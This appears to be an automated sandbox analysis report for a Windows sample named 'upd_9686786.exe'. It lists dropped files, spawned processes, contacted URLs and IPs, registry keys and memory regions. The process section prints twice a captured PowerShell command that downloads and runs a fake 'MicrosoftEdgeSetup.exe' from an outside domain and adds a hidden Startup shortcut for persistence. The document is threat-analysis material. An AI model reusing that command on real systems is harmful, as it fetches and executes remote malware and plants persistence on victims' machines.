Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
upd_9686786.exe
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive,
ctime=Tue Oct 1 10:19:13 2024, mtime=Tue Oct 1 16:19:43 2024, atime=Tue Oct 1 16:19:40 2024, length=92408, window=hide
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0gsx0sm.gmi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbrgwyvk.gyb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpsfeg15.nww.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ye1q3xtv.ggv.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\upd_9686786.exe
|
"C:\Users\user\Desktop\upd_9686786.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\"
; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start
Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath
= [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut =
$WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath)
; $shortcut.Save()"
|
|
|
|
C:\Windows\System32\systeminfo.exe
|
systeminfo
|
|
|
|
C:\Users\user\Desktop\upd_9686786.exe
|
"C:\Users\user\Desktop\upd_9686786.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\"
; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start
Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath
= [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut =
$WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath)
; $shortcut.Save()"
|
|
|
|
C:\Windows\System32\systeminfo.exe
|
systeminfo
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c systeminfo
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c systeminfo
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
|
|
|
https://go.micro
|
unknown
|
|
|
|
https://github.com/Pester/Pester
|
unknown
|
|
|
|
https://apple-online.shop
|
unknown
|
|
|
|
https://apple-online.shop/MicrosoftEdgeSetup.exe
|
unknown
|
|
|
|
https://apple-online.shop/MicrosoftEdgeSetup.
|
unknown
|
|
|
|
http://cevcsca2021.ocsp-certum.com07
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.pngh
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
|
unknown
|
||
|
https://www.certum.pl/CPS0
|
unknown
|
||
|
http://apple-online.shop
|
unknown
|
||
|
http://repository.certum.pl/cevcsca2021.cer0
|
unknown
|
||
|
https://apple-online.shop/microsoftedgesetup.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.htmlXz
|
unknown
|
||
|
http://subca.ocsp-certum.com02
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://github.com/Pester/Pesterh
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.htmlh
|
unknown
|
||
|
http://crl.certum.pl/ctnca2.crl0l
|
unknown
|
||
|
http://repository.certum.pl/ctnca2.cer09
|
unknown
|
||
|
http://www.quovadis.bm0
|
unknown
|
||
|
https://github.com/Pester/PesterXz
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://ocsp.quovadisoffshore.com0
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.certum.pl/CPS0
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.pngXz
|
unknown
|
There are 24 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
65.38.120.47
|
unknown
|
United States
|
||
|
217.148.142.19
|
unknown
|
Romania
|
||
|
172.67.178.253
|
unknown
|
United States
|
||
|
65.109.226.176
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\e\52C64B7E
|
@%SystemRoot%\system32\mlang.dll,-4386
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
16F74E50000
|
heap
|
page read and write
|
||
|
215F442D000
|
heap
|
page read and write
|
||
|
215F4476000
|
heap
|
page read and write
|
||
|
16F74820000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D60000
|
trusted library allocation
|
page read and write
|
||
|
17776585000
|
heap
|
page read and write
|
||
|
20DF2CF4000
|
heap
|
page read and write
|
||
|
689C1FD000
|
stack
|
page read and write
|
||
|
16F752A4000
|
heap
|
page read and write
|
||
|
689CECE000
|
stack
|
page read and write
|
||
|
7FF76E657000
|
unkown
|
page write copy
|
||
|
7FFCFB0F2000
|
unkown
|
page readonly
|
||
|
7FFC94D30000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94AA2000
|
trusted library allocation
|
page read and write
|
||
|
16F72E5E000
|
heap
|
page read and write
|
||
|
22957657000
|
heap
|
page read and write
|
||
|
20D82AFE000
|
trusted library allocation
|
page read and write
|
||
|
16F72FA0000
|
heap
|
page read and write
|
||
|
7FFC94C51000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4447000
|
heap
|
page read and write
|
||
|
689C2FD000
|
stack
|
page read and write
|
||
|
20DF2395000
|
heap
|
page read and write
|
||
|
2295765C000
|
heap
|
page read and write
|
||
|
689D00E000
|
stack
|
page read and write
|
||
|
20D830A4000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94EA4000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94DA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D50000
|
trusted library allocation
|
page read and write
|
||
|
689BF7D000
|
stack
|
page read and write
|
||
|
6E6C0FF000
|
stack
|
page read and write
|
||
|
16F752FD000
|
heap
|
page read and write
|
||
|
689B9FF000
|
stack
|
page read and write
|
||
|
20DF2E3E000
|
heap
|
page read and write
|
||
|
16F0309F000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4450000
|
heap
|
page read and write
|
||
|
20DF3090000
|
heap
|
page read and write
|
||
|
20D901B7000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4448000
|
heap
|
page read and write
|
||
|
7FFC94B60000
|
trusted library allocation
|
page execute and read and write
|
||
|
20DF3260000
|
heap
|
page read and write
|
||
|
7FFC94D40000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D10000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94F30000
|
trusted library allocation
|
page read and write
|
||
|
20DF2CA0000
|
heap
|
page read and write
|
||
|
16F72E9C000
|
heap
|
page read and write
|
||
|
20D80001000
|
trusted library allocation
|
page read and write
|
||
|
16F74F35000
|
heap
|
page read and write
|
||
|
1777665A000
|
heap
|
page read and write
|
||
|
20D81748000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D90000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4451000
|
heap
|
page read and write
|
||
|
16F014F6000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94F30000
|
trusted library allocation
|
page read and write
|
||
|
E76BF8D000
|
stack
|
page read and write
|
||
|
20DF2CB4000
|
heap
|
page read and write
|
||
|
E76DB0D000
|
stack
|
page read and write
|
||
|
215F4442000
|
heap
|
page read and write
|
||
|
7FF76E65C000
|
unkown
|
page write copy
|
||
|
7FFC94E82000
|
trusted library allocation
|
page read and write
|
||
|
2295764E000
|
heap
|
page read and write
|
||
|
215F4416000
|
heap
|
page read and write
|
||
|
E76CA7D000
|
stack
|
page read and write
|
||
|
7FFC94C70000
|
trusted library allocation
|
page execute and read and write
|
||
|
22957652000
|
heap
|
page read and write
|
||
|
7FFC94D20000
|
trusted library allocation
|
page read and write
|
||
|
20D80495000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94DB0000
|
trusted library allocation
|
page read and write
|
||
|
20DF26F0000
|
trusted library allocation
|
page read and write
|
||
|
689B4B3000
|
stack
|
page read and write
|
||
|
1FCA4451000
|
heap
|
page read and write
|
||
|
20DF2A5C000
|
heap
|
page read and write
|
||
|
16F10001000
|
trusted library allocation
|
page read and write
|
||
|
689BD7E000
|
stack
|
page read and write
|
||
|
22A3F5C0000
|
unclassified section
|
page readonly
|
||
|
1FCA4459000
|
heap
|
page read and write
|
||
|
1FCA443C000
|
heap
|
page read and write
|
||
|
7FFCFB0D0000
|
unkown
|
page readonly
|
||
|
177765EC000
|
heap
|
page read and write
|
||
|
7FFCFB0F2000
|
unkown
|
page readonly
|
||
|
20DF3340000
|
heap
|
page read and write
|
||
|
7FFC94AC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
215F440D000
|
heap
|
page read and write
|
||
|
7FFC94C62000
|
trusted library allocation
|
page read and write
|
||
|
7FFCFB0E6000
|
unkown
|
page readonly
|
||
|
7FFC94B86000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFC94CF0000
|
trusted library allocation
|
page read and write
|
||
|
16F72EC8000
|
heap
|
page read and write
|
||
|
E76C97B000
|
stack
|
page read and write
|
||
|
1FCA442B000
|
heap
|
page read and write
|
||
|
22957624000
|
heap
|
page read and write
|
||
|
1FCA4451000
|
heap
|
page read and write
|
||
|
16F02B7A000
|
trusted library allocation
|
page read and write
|
||
|
22A3F390000
|
heap
|
page read and write
|
||
|
7FFC94ACD000
|
trusted library allocation
|
page execute and read and write
|
||
|
E76C9FD000
|
stack
|
page read and write
|
||
|
7FF76E65C000
|
unkown
|
page read and write
|
||
|
7FFC94AA4000
|
trusted library allocation
|
page read and write
|
||
|
215F44E5000
|
heap
|
page read and write
|
||
|
E76D94D000
|
stack
|
page read and write
|
||
|
7FF76E650000
|
unkown
|
page readonly
|
||
|
16F75265000
|
heap
|
page read and write
|
||
|
20DF2A5A000
|
heap
|
page read and write
|
||
|
16F75560000
|
heap
|
page read and write
|
||
|
215F4461000
|
heap
|
page read and write
|
||
|
22A3F5B0000
|
unclassified section
|
page readonly
|
||
|
20DF2E85000
|
heap
|
page read and write
|
||
|
7FFC94D60000
|
trusted library allocation
|
page read and write
|
||
|
E76CCFD000
|
stack
|
page read and write
|
||
|
7FF76E65C000
|
unkown
|
page read and write
|
||
|
20D82B1F000
|
trusted library allocation
|
page read and write
|
||
|
20D82B2C000
|
trusted library allocation
|
page read and write
|
||
|
215F4380000
|
heap
|
page read and write
|
||
|
215F440A000
|
heap
|
page read and write
|
||
|
20D82B02000
|
trusted library allocation
|
page read and write
|
||
|
16F758A0000
|
heap
|
page read and write
|
||
|
215F43E9000
|
heap
|
page read and write
|
||
|
16F101BC000
|
trusted library allocation
|
page read and write
|
||
|
689CE0E000
|
stack
|
page read and write
|
||
|
16F7512C000
|
heap
|
page read and write
|
||
|
689D088000
|
stack
|
page read and write
|
||
|
20DF2E06000
|
heap
|
page read and write
|
||
|
E76D8CF000
|
stack
|
page read and write
|
||
|
7FFC94F20000
|
trusted library allocation
|
page read and write
|
||
|
E76C37E000
|
stack
|
page read and write
|
||
|
E76D84E000
|
stack
|
page read and write
|
||
|
177765DC000
|
heap
|
page read and write
|
||
|
16F75159000
|
heap
|
page read and write
|
||
|
7FFC94BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22957740000
|
heap
|
page read and write
|
||
|
20D82B70000
|
trusted library allocation
|
page read and write
|
||
|
20DF3080000
|
heap
|
page read and write
|
||
|
E76C4FE000
|
stack
|
page read and write
|
||
|
CFECB69000
|
stack
|
page read and write
|
||
|
7FFC94DF0000
|
trusted library allocation
|
page read and write
|
||
|
16F01689000
|
trusted library allocation
|
page read and write
|
||
|
20D80077000
|
trusted library allocation
|
page read and write
|
||
|
20DF29E0000
|
heap
|
page execute and read and write
|
||
|
20DF239D000
|
heap
|
page read and write
|
||
|
7FFC94C40000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4459000
|
heap
|
page read and write
|
||
|
22957626000
|
heap
|
page read and write
|
||
|
1191BFB000
|
stack
|
page read and write
|
||
|
7FFC94D30000
|
trusted library allocation
|
page read and write
|
||
|
689C3FC000
|
stack
|
page read and write
|
||
|
20DF2CB2000
|
heap
|
page read and write
|
||
|
16F759B0000
|
heap
|
page read and write
|
||
|
22A3F6D0000
|
unclassified section
|
page readonly
|
||
|
20DF3640000
|
heap
|
page read and write
|
||
|
16F72F70000
|
trusted library allocation
|
page read and write
|
||
|
2295764E000
|
heap
|
page read and write
|
||
|
20D90074000
|
trusted library allocation
|
page read and write
|
||
|
20DF2780000
|
trusted library allocation
|
page read and write
|
||
|
20D82B16000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94F10000
|
trusted library allocation
|
page read and write
|
||
|
16F754D0000
|
heap
|
page read and write
|
||
|
215F4389000
|
heap
|
page read and write
|
||
|
16F751C7000
|
heap
|
page read and write
|
||
|
1FCA4700000
|
heap
|
page read and write
|
||
|
7FF76E65D000
|
unkown
|
page readonly
|
||
|
16F0007D000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94E14000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94DB0000
|
trusted library allocation
|
page read and write
|
||
|
20D82B10000
|
trusted library allocation
|
page read and write
|
||
|
22957642000
|
heap
|
page read and write
|
||
|
22957630000
|
heap
|
page read and write
|
||
|
16F74870000
|
trusted library allocation
|
page read and write
|
||
|
20DF2D45000
|
heap
|
page read and write
|
||
|
16F750B0000
|
heap
|
page execute and read and write
|
||
|
20DF2D7E000
|
heap
|
page read and write
|
||
|
177764E3000
|
heap
|
page read and write
|
||
|
20D81683000
|
trusted library allocation
|
page read and write
|
||
|
2295765D000
|
heap
|
page read and write
|
||
|
12EDC440000
|
heap
|
page read and write
|
||
|
7FFC94DC0000
|
trusted library allocation
|
page read and write
|
||
|
20DF2300000
|
heap
|
page read and write
|
||
|
16F7519E000
|
heap
|
page read and write
|
||
|
1FCA4411000
|
heap
|
page read and write
|
||
|
7FFC94CE0000
|
trusted library allocation
|
page read and write
|
||
|
20DF2DA0000
|
heap
|
page read and write
|
||
|
7FFC94C71000
|
trusted library allocation
|
page read and write
|
||
|
20DF2E78000
|
heap
|
page read and write
|
||
|
7FFC94E37000
|
trusted library allocation
|
page read and write
|
||
|
20DF2A19000
|
heap
|
page read and write
|
||
|
7FFC94B56000
|
trusted library allocation
|
page read and write
|
||
|
2295764C000
|
heap
|
page read and write
|
||
|
7FF76E650000
|
unkown
|
page readonly
|
||
|
689C07D000
|
stack
|
page read and write
|
||
|
20DF2710000
|
trusted library allocation
|
page read and write
|
||
|
16F72DC0000
|
heap
|
page read and write
|
||
|
6E6BFFE000
|
stack
|
page read and write
|
||
|
1FCA43F0000
|
heap
|
page read and write
|
||
|
16F74D90000
|
heap
|
page read and write
|
||
|
22A3F5DC000
|
heap
|
page read and write
|
||
|
16F7531E000
|
heap
|
page read and write
|
||
|
1777666A000
|
heap
|
page read and write
|
||
|
17776631000
|
heap
|
page read and write
|
||
|
2295765A000
|
heap
|
page read and write
|
||
|
7FFC94C7A000
|
trusted library allocation
|
page read and write
|
||
|
7FF76E659000
|
unkown
|
page readonly
|
||
|
16F013CC000
|
trusted library allocation
|
page read and write
|
||
|
6E6BF7E000
|
stack
|
page read and write
|
||
|
22957630000
|
heap
|
page read and write
|
||
|
1FCA4450000
|
heap
|
page read and write
|
||
|
16F752D1000
|
heap
|
page read and write
|
||
|
1FCA4448000
|
heap
|
page read and write
|
||
|
16F013C8000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94CD0000
|
trusted library allocation
|
page read and write
|
||
|
20DF2700000
|
heap
|
page readonly
|
||
|
20DF0A59000
|
heap
|
page read and write
|
||
|
7FFC94F0B000
|
trusted library allocation
|
page read and write
|
||
|
20DF09D7000
|
heap
|
page read and write
|
||
|
7FF76E65D000
|
unkown
|
page readonly
|
||
|
20D8022F000
|
trusted library allocation
|
page read and write
|
||
|
689BFFB000
|
stack
|
page read and write
|
||
|
16F754C0000
|
heap
|
page read and write
|
||
|
16F74EAE000
|
heap
|
page read and write
|
||
|
CFECE7E000
|
stack
|
page read and write
|
||
|
177765FE000
|
heap
|
page read and write
|
||
|
1FCA442B000
|
heap
|
page read and write
|
||
|
CFECFFF000
|
stack
|
page read and write
|
||
|
16F72F31000
|
heap
|
page read and write
|
||
|
20DF0A0F000
|
heap
|
page read and write
|
||
|
7FFC94CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F75130000
|
heap
|
page read and write
|
||
|
177765C3000
|
heap
|
page read and write
|
||
|
E76DA88000
|
stack
|
page read and write
|
||
|
7FFC94F60000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94F10000
|
trusted library allocation
|
page read and write
|
||
|
E76CBFD000
|
stack
|
page read and write
|
||
|
2295764E000
|
heap
|
page read and write
|
||
|
7FFC94B7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F0137B000
|
trusted library allocation
|
page read and write
|
||
|
7FFCFB0D0000
|
unkown
|
page readonly
|
||
|
20DF0AD0000
|
heap
|
page read and write
|
||
|
177764EB000
|
heap
|
page read and write
|
||
|
E76D98E000
|
stack
|
page read and write
|
||
|
20D81401000
|
trusted library allocation
|
page read and write
|
||
|
20D90001000
|
trusted library allocation
|
page read and write
|
||
|
22A3F540000
|
heap
|
page read and write
|
||
|
16F003D1000
|
trusted library allocation
|
page read and write
|
||
|
2295765E000
|
heap
|
page read and write
|
||
|
20DF2390000
|
heap
|
page read and write
|
||
|
16F7523F000
|
heap
|
page read and write
|
||
|
1FCA4450000
|
heap
|
page read and write
|
||
|
1FCA444D000
|
heap
|
page read and write
|
||
|
16F01406000
|
trusted library allocation
|
page read and write
|
||
|
16F02D0D000
|
trusted library allocation
|
page read and write
|
||
|
7FF76E651000
|
unkown
|
page execute read
|
||
|
7FFCFB0D0000
|
unkown
|
page readonly
|
||
|
7FFC94E00000
|
trusted library allocation
|
page read and write
|
||
|
16F0049A000
|
trusted library allocation
|
page read and write
|
||
|
689C27D000
|
stack
|
page read and write
|
||
|
20D813C2000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94EA2000
|
trusted library allocation
|
page read and write
|
||
|
689BEFB000
|
stack
|
page read and write
|
||
|
22A3F5D0000
|
heap
|
page read and write
|
||
|
689BCFD000
|
stack
|
page read and write
|
||
|
6E6BE79000
|
stack
|
page read and write
|
||
|
7FFC94D00000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94B70000
|
trusted library allocation
|
page read and write
|
||
|
20D8174C000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
20DF2A85000
|
heap
|
page read and write
|
||
|
17776531000
|
heap
|
page read and write
|
||
|
E76C47E000
|
stack
|
page read and write
|
||
|
1FCA443C000
|
heap
|
page read and write
|
||
|
1FCA4414000
|
heap
|
page read and write
|
||
|
689C17E000
|
stack
|
page read and write
|
||
|
16F013A7000
|
trusted library allocation
|
page read and write
|
||
|
215F4420000
|
heap
|
page read and write
|
||
|
7FFC94DD0000
|
trusted library allocation
|
page read and write
|
||
|
16F72E84000
|
heap
|
page read and write
|
||
|
7FFC94AB0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA443F000
|
heap
|
page read and write
|
||
|
2295765E000
|
heap
|
page read and write
|
||
|
22957550000
|
heap
|
page read and write
|
||
|
7FF76E65C000
|
unkown
|
page write copy
|
||
|
20DF2AF6000
|
heap
|
page execute and read and write
|
||
|
22957642000
|
heap
|
page read and write
|
||
|
215F44BF000
|
heap
|
page read and write
|
||
|
E76C27E000
|
stack
|
page read and write
|
||
|
16F74E46000
|
heap
|
page execute and read and write
|
||
|
7FFCFB0F2000
|
unkown
|
page readonly
|
||
|
689B5BE000
|
stack
|
page read and write
|
||
|
E76CB7D000
|
stack
|
page read and write
|
||
|
7FFC94C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF76E65D000
|
unkown
|
page readonly
|
||
|
20DF2A12000
|
heap
|
page read and write
|
||
|
7FFC94C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
E76BF03000
|
stack
|
page read and write
|
||
|
22957642000
|
heap
|
page read and write
|
||
|
16F759B4000
|
heap
|
page read and write
|
||
|
7FFC94E17000
|
trusted library allocation
|
page read and write
|
||
|
16F72F90000
|
heap
|
page read and write
|
||
|
17776661000
|
heap
|
page read and write
|
||
|
7FFC94F50000
|
trusted library allocation
|
page read and write
|
||
|
20DF2D4D000
|
heap
|
page read and write
|
||
|
16F10079000
|
trusted library allocation
|
page read and write
|
||
|
16F74F39000
|
heap
|
page read and write
|
||
|
7FFC94ABB000
|
trusted library allocation
|
page read and write
|
||
|
16F74F04000
|
heap
|
page read and write
|
||
|
689C37D000
|
stack
|
page read and write
|
||
|
215F4488000
|
heap
|
page read and write
|
||
|
CFECF7F000
|
stack
|
page read and write
|
||
|
20DF2DDD000
|
heap
|
page read and write
|
||
|
7FFC94F00000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94AAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D803D4000
|
trusted library allocation
|
page read and write
|
||
|
7FF76E651000
|
unkown
|
page execute read
|
||
|
7FFC94AD0000
|
trusted library allocation
|
page read and write
|
||
|
20DF2E69000
|
heap
|
page read and write
|
||
|
20DF2B30000
|
heap
|
page read and write
|
||
|
7FFC94CC0000
|
trusted library allocation
|
page read and write
|
||
|
215F44F1000
|
heap
|
page read and write
|
||
|
16F74D20000
|
heap
|
page execute and read and write
|
||
|
1FCA444E000
|
heap
|
page read and write
|
||
|
689B8FF000
|
stack
|
page read and write
|
||
|
16F72E40000
|
heap
|
page read and write
|
||
|
7FFC94C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
E76C87E000
|
stack
|
page read and write
|
||
|
20DF2E9E000
|
heap
|
page read and write
|
||
|
7FFCFB0F0000
|
unkown
|
page read and write
|
||
|
16F75120000
|
heap
|
page read and write
|
||
|
1FCA4450000
|
heap
|
page read and write
|
||
|
1FCA4450000
|
heap
|
page read and write
|
||
|
20DF2D41000
|
heap
|
page read and write
|
||
|
20D902FD000
|
trusted library allocation
|
page read and write
|
||
|
20DF0B55000
|
heap
|
page read and write
|
||
|
20DF0A2C000
|
heap
|
page read and write
|
||
|
7FFC94DC0000
|
trusted library allocation
|
page read and write
|
||
|
E76C8FB000
|
stack
|
page read and write
|
||
|
177765F2000
|
heap
|
page read and write
|
||
|
215F4429000
|
heap
|
page read and write
|
||
|
E76CC7D000
|
stack
|
page read and write
|
||
|
E76CAFD000
|
stack
|
page read and write
|
||
|
16F102F3000
|
trusted library allocation
|
page read and write
|
||
|
16F00001000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94B76000
|
trusted library allocation
|
page read and write
|
||
|
1FCA443C000
|
heap
|
page read and write
|
||
|
20DF2D8C000
|
heap
|
page read and write
|
||
|
177764AA000
|
heap
|
page read and write
|
||
|
E76CD7C000
|
stack
|
page read and write
|
||
|
177765AB000
|
heap
|
page read and write
|
||
|
689B97D000
|
stack
|
page read and write
|
||
|
E76C7FF000
|
stack
|
page read and write
|
||
|
689B87E000
|
stack
|
page read and write
|
||
|
16F75156000
|
heap
|
page read and write
|
||
|
17776430000
|
heap
|
page read and write
|
||
|
22957659000
|
heap
|
page read and write
|
||
|
1FCA4419000
|
heap
|
page read and write
|
||
|
CFECBEE000
|
stack
|
page read and write
|
||
|
E76C6FC000
|
stack
|
page read and write
|
||
|
E76BFCE000
|
stack
|
page read and write
|
||
|
7FFC94CB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94ADB000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94DE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94D10000
|
trusted library allocation
|
page read and write
|
||
|
7FFCFB0D1000
|
unkown
|
page execute read
|
||
|
16F72F3A000
|
heap
|
page read and write
|
||
|
22957633000
|
heap
|
page read and write
|
||
|
16F02DEB000
|
trusted library allocation
|
page read and write
|
||
|
1FCA4459000
|
heap
|
page read and write
|
||
|
689BBF7000
|
stack
|
page read and write
|
||
|
7FFC94CA5000
|
trusted library allocation
|
page read and write
|
||
|
12EDC2E0000
|
unclassified section
|
page readonly
|
||
|
689CE4E000
|
stack
|
page read and write
|
||
|
12EDC1D0000
|
unclassified section
|
page readonly
|
||
|
16F74FD0000
|
heap
|
page read and write
|
||
|
7FFC94CA0000
|
trusted library allocation
|
page read and write
|
||
|
16F02874000
|
trusted library allocation
|
page read and write
|
||
|
22957735000
|
heap
|
page read and write
|
||
|
16F02153000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
22A3F4D0000
|
heap
|
page read and write
|
||
|
6E6C07E000
|
stack
|
page read and write
|
||
|
16F01753000
|
trusted library allocation
|
page read and write
|
||
|
20DF2740000
|
trusted library allocation
|
page read and write
|
||
|
7FFC94B5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFC94AC0000
|
trusted library allocation
|
page read and write
|
||
|
1FCA444E000
|
heap
|
page read and write
|
||
|
7FFC94CC0000
|
trusted library allocation
|
page read and write
|
||
|
20DF2E3A000
|
heap
|
page read and write
|
||
|
22957659000
|
heap
|
page read and write
|
||
|
22957659000
|
heap
|
page read and write
|
||
|
7FF76E65D000
|
unkown
|
page readonly
|
||
|
16F74EE3000
|
heap
|
